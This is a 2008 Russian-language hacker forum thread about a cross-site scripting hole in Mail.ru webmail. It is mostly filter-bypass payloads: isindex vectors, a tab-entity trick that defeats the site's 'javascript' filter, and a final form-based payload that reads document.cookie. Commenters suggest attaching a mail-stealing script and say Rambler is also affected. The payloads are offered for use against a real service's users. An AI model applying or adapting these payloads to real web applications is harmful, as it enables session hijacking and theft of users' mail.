Активная XSS Mail.ru (IE6) / 09.11.08

Discussion in 'Уязвимости' started by brain[pillow], 9 Nov 2008.

  1. brain[pillow]

    brain[pillow] Active Member

    Joined:
    7 Nov 2008
    Messages:
    7
    Likes Received:
    103
    Reputations:
    74
    Недавно рылся по секьюрити блогам, и нашёл вот такой вот интересный пост с двумя XSS-конструкциями для браузера IE (http://www.thespanner.co.uk/2008/08/26/new-xss-vector/):
    Code:
    [b]1)[/b] <isindex type=image src=1 onerror=alert(1)>

[b]2) <isindex action=javascript:alert(1) type=image>[/b]
    Первая конструкция работает под все версии IE, но на mail.ru тщательно фильтруется активное содержимое любых тегов, поэтому вариант с onload/onerror я отбросил исходя из прошлого горького опыта.

    А вот вторая XSS выглядела немного более многообещающей. Заюзав её в неизменном виде на почте mail.ru я получил вот что:
    Code:
    <isindex action=xjavascript:alert(1) type=image>
    Через 5 минут этот фильтр обошёлся добавлением загнанной в hex табуляции (&#9). Фильтр сделал с этим вариантом следующее:
    Code:
    <isindex action=&#x9javascript:alert(1) type=image>
    А это дело корректно обрабатывается в ослике, поэтому на данный момент мы имеем активную XSS в теле письма для IE 6.0:

    Code:
    <isindex action=&#9javascript:alert(1) type=image>
    Пасиба за внимание, надеюсь, кому-нибудь пригодится :)
     
    #1 brain[pillow], 9 Nov 2008
    Last edited: 9 Nov 2008
    10 people like this.
  2. AdReNa1!Ne

    AdReNa1!Ne Elder - Старейшина

    Joined:
    24 May 2007
    Messages:
    70
    Likes Received:
    105
    Reputations:
    14
    Ну что ж, молодец) Будем знать)
     
    #2 AdReNa1!Ne, 9 Nov 2008
    1 person likes this.
  3. 9()K_t()R

    9()K_t()R Banned

    Joined:
    9 Nov 2008
    Messages:
    4
    Likes Received:
    5
    Reputations:
    0
    +1
     
    #3 9()K_t()R, 9 Nov 2008
  4. cremator (c)

    cremator (c) Elder - Старейшина

    Joined:
    20 Jun 2008
    Messages:
    258
    Likes Received:
    72
    Reputations:
    0
    Еще и на рамблер есть
     
    #4 cremator (c), 9 Nov 2008
  5. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    У меня только как пассивка срабатывает
     
    _________________________
    #5 Kaimi, 9 Nov 2008
  6. NFM

    NFM Reservists Of Antichat

    Joined:
    16 Jan 2006
    Messages:
    308
    Likes Received:
    191
    Reputations:
    22
    в ие7 картинка типа и при нажатие алерт срабатывает
     
    #6 NFM, 9 Nov 2008
  7. $n@ke

    $n@ke Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    696
    Likes Received:
    404
    Reputations:
    134
    в 8 Бета - тоже самое что и у Kaimi
    x3 что за нах..
     
    #7 $n@ke, 10 Nov 2008
  8. slider

    slider Reservists Of Antichat

    Joined:
    4 Sep 2005
    Messages:
    501
    Likes Received:
    711
    Reputations:
    748
    Кстать по секрету .. =AdReNa1!Ne работает в mail.ru ;)
     
    #8 slider, 10 Nov 2008
  9. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    разведчик=\
     
    #9 iddqd, 10 Nov 2008
  10. Chaak

    Chaak Elder - Старейшина

    Joined:
    1 Jun 2008
    Messages:
    1,059
    Likes Received:
    1,067
    Reputations:
    80
    может ты его спутал с модератором ксакепа?
     
    #10 Chaak, 10 Nov 2008
  11. F1shka

    F1shka Elder - Старейшина

    Joined:
    10 Apr 2008
    Messages:
    173
    Likes Received:
    305
    Reputations:
    3
    Скорее казачёк засланный)
     
    #11 F1shka, 10 Nov 2008
  12. LeverOne

    LeverOne Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    52
    Likes Received:
    128
    Reputations:
    115
    1. Имеем пассивную, как было уже всеми отмечено, потому как в action она никогда и нигде не будет активной. Активная в isindex возможна только в атрибуте src (и родственных), но на mail.ru она не сработает, поскольку против таких вариантов там двойная защита: параметр src должен отвечать строгим требованиям. Если не отвечает, он автоматически замещается на мейловскую картинку-пиксель.

    Конечно, это не просто пассивная, а пассивная в теле сообщения. Иx преимущества в том, что они не блокируются как потенциальные xss-атаки NoScript`ом для FF, и к ним можно прикрутить javascript-граббер почты.

    2. Фильтр перевел табуляцию из десятичной в шестнадцатеричную из-за ошибки в определении начала параметра при использовании dec без явного разделителя (;). Начало параметра ему нужно, чтобы вставить "x". А "x" он вставляет всегда там, где находит сочетание "script", даже если это "blablascript". Ты эту ошибку обнаружил, тебе респекты.

    3. Далее. Эти так называемые "новые" xss здесь ни при чем. Они только все портят, делая пассивную рабочей только в IE. Обычный тег form расширяет область работоспособности и на FF, и на Opera.

    Code:
    <form action="&#9javascript:alert(document.cookie)" target="_self"><input type=image src=http://sittttteeee.ru></form>
     
    #12 LeverOne, 14 Nov 2008
    Last edited: 15 Nov 2008
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.